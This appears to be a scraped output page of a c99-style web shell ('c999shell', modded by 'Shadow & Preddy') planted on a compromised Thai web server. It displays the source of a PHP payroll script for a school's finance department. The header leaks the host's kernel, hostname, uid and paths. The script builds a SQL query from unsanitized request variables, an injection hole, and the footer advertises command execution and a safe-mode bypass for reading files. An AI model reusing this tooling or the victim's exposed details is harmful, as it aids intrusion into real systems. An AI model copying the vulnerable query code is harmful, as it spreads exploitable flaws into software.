Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Money_depart/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php session_start(); /** Define Validate Access */ define( '_VALID_ACCESS', 1 ); /** Check Session User Login */ if (! session_is_registered("valid_user") ) { echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>"; echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />"; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/FunctionDB.php" ); /** Create Database Object */ $dbObj = new DBConn; //### รับค่าจาก Form //$BuildD_Yr = $_POST['mYear']."-".$_POST['mMonth']."-".$_POST['mDate']; $Teacher_code = trim( $Teacher_code ); $Teacher_id = trim( $Teacher_id ); $Salary_1 = trim( $Salary_1 ); $Salary_2 = trim( $Salary_2 ); $Salary_3 = trim( $Salary_3 ); $Costt_1 = trim( $Costt_1 ); $Costt_2 = trim( $Costt_2 ); $Costt_3 = trim( $Costt_3 ); $Costt_4 = trim( $Costt_4 ); $Costt_5 = trim( $Costt_5 ); $Costt_6= trim( $Costt_6 ); $Costt_7 = trim( $Costt_7 ); $Costt_8 = trim( $Costt_8 ); $Costt_9 = trim( $Costt_9 ); $Costt_10 = trim( $Costt_10 ); $Costt_11 = trim( $Costt_11 ); $Costt_12 = trim( $Costt_12 ); $Costt_13 = trim( $Costt_13 ); $Costt_14 = trim( $Costt_14 ); $Costt_15 = trim( $Costt_15 ); $Costt_16 = trim( $Costt_16 ); $Costt_17 = trim( $Costt_17 ); $Costt_18 = trim( $Costt_18 ); $Costt_19 = trim( $Costt_19 ); $Start_mont = trim( $Start_mont ); $Start_year = trim( $Start_year ); ///---------บวกด้านรายรับ--------------------/// $Costt_salary = $Costt_1+ $Costt_2 + $Costt_3 + $Costt_4 + $Costt_5 + $Costt_6 + $Costt_7 + $Costt_8 + $Costt_9 + $Costt10 + $Costt_11 + $Costt_12 + $Costt_13 + $Costt_14 + $Costt_15 + $Salary_1 + $Salary_2 + $Salary_3; /////----------บวกด้านรายจ่าย-------------//// $Costt_to = $Costt_16 + $Costt_17 + $Costt_18 + $Costt_19 + $Costt_20 + $Costt_21 + $Costt_22 + $Costt_23 + $Costt_24 + $Costt_25 + $Costt_26 + $Costt_27 + $Costt_28 + $Costt_29 + $Costt_30; $Costt_total = $Costt_salary - $Costt_to ; //### Select ข้อมูลมาก่อน เพื่อเปรียบเทียบว่ามีข้อมูลอยู่แล้วหรือไม่ $sql = "Select * From salary_repot_tb Where Teacher_code='$Teacher_code' AND Start_mont='$Start_mont' AND Start_year='$Start_year' "; $result = mysql_query($sql); $numrows = mysql_num_rows($result); if( $numrows == 0 ) { //echo "Insert"; Insert_Salary_repot ( $Teacher_code , $Teacher_id , $StatusId , $Faculty_code , $Person_type , $Start_mont , $Start_year , $Salary_1 , $Salary_2 , $Salary_3 , $Costt_1 , $Costt_2 , $Costt_3 , $Costt_4 , $Costt_5 , $Costt_6 , $Costt_7 , $Costt_8 , $Costt_9 , $Costt_10 , $Costt_11 , $Costt_12 , $Costt_13 , $Costt_14 , $Costt_15 , $Costt_16 , $Costt_17 , $Costt_18 , $Costt_19 , $Costt_20 , $Costt_21 , $Costt_22 , $Costt_23 , $Costt_24 , $Costt_25 , $Costt_26 , $Costt_27, $Costt_28, $Costt_29, $Costt_30, $Costt_salary , $Costt_to , $Costt_total , $Flag ); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; echo "<script>alert('บันทึกข้อมูลเรียบร้อยแล้ว');</script>"; } else { //echo "Update"; echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; echo "<script>alert('ข้อมูลมีอยู่แล้ว ไม่สามารถบันทึกได้ กรุณากลับไปแก้ไขค่ะ');</script>"; } /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; echo "<script>window.opener.document.all.myForm; window.opener.location.reload(); window.close();</script>"; exit(); //InsertSalaryType($SalaryId,$Detail,$SalaryStatus,$Flag); /** Close the Database */ //$dbObj->disconn(); /** Unset Class */ //unset($dbObj); /** Output */ //if( $result1 ) { //echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; /*echo "<script>alert('บันทึกข้อมูลเรียบร้อยแล้ว');</script>"; echo "<script>window.opener.document.all.myForm; window.opener.location.reload(); window.close();</script>"; //echo "<meta http-equiv='refresh' content='0; URL=DecorPersonalList.php'>"; exit(); } */ } // end.. else //} # else ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> <title>Insert Salary</title> <link href="../css/default.css" rel="stylesheet" type="text/css" /> </head> <body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0"> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]-- |